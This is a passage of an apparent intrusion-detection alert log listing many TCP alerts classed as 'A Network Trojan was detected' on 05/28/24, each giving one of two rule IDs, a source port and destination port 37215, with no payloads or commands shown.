            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552722
            SID:2829579
            Source Port:51120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062708
            SID:2835222
            Source Port:45784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312063
            SID:2829579
            Source Port:52402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559369
            SID:2835222
            Source Port:59254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313124
            SID:2835222
            Source Port:42554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995601
            SID:2829579
            Source Port:57360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929802
            SID:2835222
            Source Port:58834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826486
            SID:2829579
            Source Port:44228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.372565
            SID:2829579
            Source Port:33534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060936
            SID:2835222
            Source Port:34424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863704
            SID:2829579
            Source Port:47364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923889
            SID:2835222
            Source Port:59112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563908
            SID:2829579
            Source Port:36728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869193
            SID:2835222
            Source Port:37720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804621
            SID:2835222
            Source Port:46426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396442
            SID:2835222
            Source Port:36856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.815725
            SID:2829579
            Source Port:46348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.053264
            SID:2835222
            Source Port:41974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507207
            SID:2829579
            Source Port:44774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903157
            SID:2835222
            Source Port:56828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.558911
            SID:2835222
            Source Port:51140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049294
            SID:2835222
            Source Port:55840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066870
            SID:2835222
            Source Port:37654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918286
            SID:2829579
            Source Port:53094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507396
            SID:2835222
            Source Port:48950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953882
            SID:2829579
            Source Port:48110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767014
            SID:2835222
            Source Port:50966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842764
            SID:2835222
            Source Port:56048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053046
            SID:2829579
            Source Port:53096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929307
            SID:2835222
            Source Port:35910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435706
            SID:2835222
            Source Port:60580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811996
            SID:2835222
            Source Port:40386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932912
            SID:2835222
            Source Port:35590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808974
            SID:2829579
            Source Port:33138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040381
            SID:2835222
            Source Port:56136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875739
            SID:2835222
            Source Port:53056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996243
            SID:2829579
            Source Port:51812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368198
            SID:2829579
            Source Port:34044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842970
            SID:2829579
            Source Port:56376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873517
            SID:2829579
            Source Port:32994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400019
            SID:2835222
            Source Port:48418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.284407
            SID:2829579
            Source Port:43254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612678
            SID:2829579
            Source Port:33776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727423
            SID:2835222
            Source Port:36378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936033
            SID:2829579
            Source Port:43356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064116
            SID:2835222
            Source Port:37628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.950773
            SID:2835222
            Source Port:41214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073282
            SID:2829579
            Source Port:48970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772839
            SID:2835222
            Source Port:57394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735495
            SID:2835222
            Source Port:39426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767462
            SID:2829579
            Source Port:49382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777511
            SID:2835222
            Source Port:52214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856470
            SID:2835222
            Source Port:48136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597005
            SID:2835222
            Source Port:35706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759567
            SID:2829579
            Source Port:37476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.895694
            SID:2835222
            Source Port:51594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300264
            SID:2835222
            Source Port:46370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074900
            SID:2835222
            Source Port:45722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327481
            SID:2829579
            Source Port:42460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698245
            SID:2835222
            Source Port:35338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.934913
            SID:2835222
            Source Port:46012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922161
            SID:2835222
            Source Port:50972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059844
            SID:2829579
            Source Port:44406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877626
            SID:2835222
            Source Port:35510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772732
            SID:2829579
            Source Port:33756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943398
            SID:2829579
            Source Port:36776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853351
            SID:2835222
            Source Port:37254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584725
            SID:2835222
            Source Port:42976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714597
            SID:2835222
            Source Port:44714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510945
            SID:2829579
            Source Port:50178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052573
            SID:2835222
            Source Port:43854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847011
            SID:2829579
            Source Port:34908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805625
            SID:2835222
            Source Port:36738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058654
            SID:2835222
            Source Port:52528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470040
            SID:2835222
            Source Port:33404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352518
            SID:2829579
            Source Port:43444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326169
            SID:2835222
            Source Port:54770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812616
            SID:2835222
            Source Port:40854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877992
            SID:2835222
            Source Port:34502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.030050
            SID:2835222
            Source Port:41978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730269
            SID:2835222
            Source Port:39128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927583
            SID:2835222
            Source Port:46170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956364
            SID:2829579
            Source Port:34928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300164
            SID:2829579
            Source Port:58410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299147
            SID:2835222
            Source Port:48328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804413
            SID:2835222
            Source Port:35230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303496
            SID:2829579
            Source Port:51910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948843
            SID:2835222
            Source Port:45704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020127
            SID:2835222
            Source Port:45396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508396
            SID:2829579
            Source Port:51486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075159
            SID:2835222
            Source Port:36260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552857
            SID:2829579
            Source Port:37938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862285
            SID:2835222
            Source Port:58234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756806
            SID:2829579
            Source Port:49546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994256
            SID:2835222
            Source Port:54110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.037847
            SID:2835222
            Source Port:48878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604968
            SID:2829579
            Source Port:46676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045494
            SID:2835222
            Source Port:49898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938983
            SID:2829579
            Source Port:34858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508087
            SID:2829579
            Source Port:40946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.574215
            SID:2835222
            Source Port:39662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760243
            SID:2835222
            Source Port:39794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014757
            SID:2829579
            Source Port:39666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485917
            SID:2835222
            Source Port:34164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871407
            SID:2829579
            Source Port:55550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065826
            SID:2835222
            Source Port:47116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842937
            SID:2835222
            Source Port:36468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.306186
            SID:2829579
            Source Port:46648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863817
            SID:2835222
            Source Port:36516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789456
            SID:2829579
            Source Port:38494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821599
            SID:2829579
            Source Port:55184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560322
            SID:2829579
            Source Port:37638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445098
            SID:2829579
            Source Port:60876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525816
            SID:2835222
            Source Port:45560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919426
            SID:2835222
            Source Port:36746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668909
            SID:2829579
            Source Port:58400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.627648
            SID:2835222
            Source Port:54496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699730
            SID:2829579
            Source Port:56046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.592692
            SID:2829579
            Source Port:49258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842895
            SID:2829579
            Source Port:45800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851297
            SID:2835222
            Source Port:44776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.768157
            SID:2829579
            Source Port:48054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596971
            SID:2835222
            Source Port:40946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810949
            SID:2835222
            Source Port:43712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376316
            SID:2829579
            Source Port:49904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870872
            SID:2835222
            Source Port:43476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322778
            SID:2835222
            Source Port:40826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.848544
            SID:2835222
            Source Port:49868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996285
            SID:2829579
            Source Port:51322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861277
            SID:2829579
            Source Port:60426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862049
            SID:2835222
            Source Port:58210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.367050
            SID:2829579
            Source Port:44698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966932
            SID:2835222
            Source Port:43938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319532
            SID:2829579
            Source Port:45052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.548602
            SID:2835222
            Source Port:41292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790470
            SID:2835222
            Source Port:43504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988237
            SID:2835222
            Source Port:54944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756657
            SID:2835222
            Source Port:41654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856266
            SID:2829579
            Source Port:48646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.488090
            SID:2829579
            Source Port:43380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575915
            SID:2829579
            Source Port:49300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596409
            SID:2835222
            Source Port:41072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778438
            SID:2835222
            Source Port:47236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825931
            SID:2835222
            Source Port:59920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884660
            SID:2829579
            Source Port:33758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843958
            SID:2829579
            Source Port:39876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058195
            SID:2829579
            Source Port:35498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990216
            SID:2835222
            Source Port:57676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933111
            SID:2829579
            Source Port:42532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953097
            SID:2835222
            Source Port:54066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.872335
            SID:2835222
            Source Port:58672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040417
            SID:2829579
            Source Port:45786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444912
            SID:2829579
            Source Port:46112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910450
            SID:2829579
            Source Port:44120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847763
            SID:2829579
            Source Port:58978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412990
            SID:2835222
            Source Port:43360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721000
            SID:2835222
            Source Port:34640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675395
            SID:2835222
            Source Port:40798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505633
            SID:2829579
            Source Port:49702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850642
            SID:2835222
            Source Port:60670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.945117
            SID:2829579
            Source Port:56986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900409
            SID:2829579
            Source Port:57358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945498
            SID:2835222
            Source Port:42226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.599634
            SID:2835222
            Source Port:48762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772100
            SID:2829579
            Source Port:48638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290532
            SID:2835222
            Source Port:40224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.376930
            SID:2829579
            Source Port:41466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392840
            SID:2829579
            Source Port:58832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855788
            SID:2835222
            Source Port:47616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808234
            SID:2829579
            Source Port:58538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945516
            SID:2829579
            Source Port:44634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880134
            SID:2829579
            Source Port:42998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002912
            SID:2835222
            Source Port:37696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070185
            SID:2835222
            Source Port:48796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878801
            SID:2829579
            Source Port:52192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020644
            SID:2835222
            Source Port:45002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.833996
            SID:2829579
            Source Port:54358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756750
            SID:2835222
            Source Port:55526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804840
            SID:2829579
            Source Port:53138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833889
            SID:2835222
            Source Port:41784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887807
            SID:2829579
            Source Port:42904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068912
            SID:2835222
            Source Port:39696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446334
            SID:2829579
            Source Port:38522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296441
            SID:2829579
            Source Port:50594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.895762
            SID:2829579
            Source Port:50776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029366
            SID:2835222
            Source Port:42630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776680
            SID:2829579
            Source Port:34076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989002
            SID:2829579
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510785
            SID:2835222
            Source Port:37962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808164
            SID:2835222
            Source Port:52476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459496
            SID:2835222
            Source Port:59014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610519
            SID:2835222
            Source Port:34784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996656
            SID:2829579
            Source Port:48948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.597428
            SID:2829579
            Source Port:43354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885078
            SID:2835222
            Source Port:50390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005172
            SID:2835222
            Source Port:54244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012440
            SID:2835222
            Source Port:43106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
